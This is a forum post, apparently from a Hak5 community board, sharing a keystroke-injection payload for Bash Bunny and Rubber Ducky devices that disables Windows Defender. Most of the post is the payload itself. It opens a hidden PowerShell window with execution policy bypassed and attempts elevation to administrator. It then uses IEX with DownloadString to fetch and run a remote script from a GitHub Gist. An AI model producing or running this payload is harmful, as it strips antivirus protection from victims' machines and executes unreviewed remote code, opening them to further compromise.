InfoSecREDD Posted January 5, 2020 Share Posted January 5, 2020 (edited) DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script:https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (Rubber Ducky) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # Q WIN R Q STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; (Developer's Note - I personally do NOT own a Rubber Ducky. This script has just been adapted to Rubber Ducky format. If any issues, please comment or contact me.) Edited January 5, 2020 by REDD Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.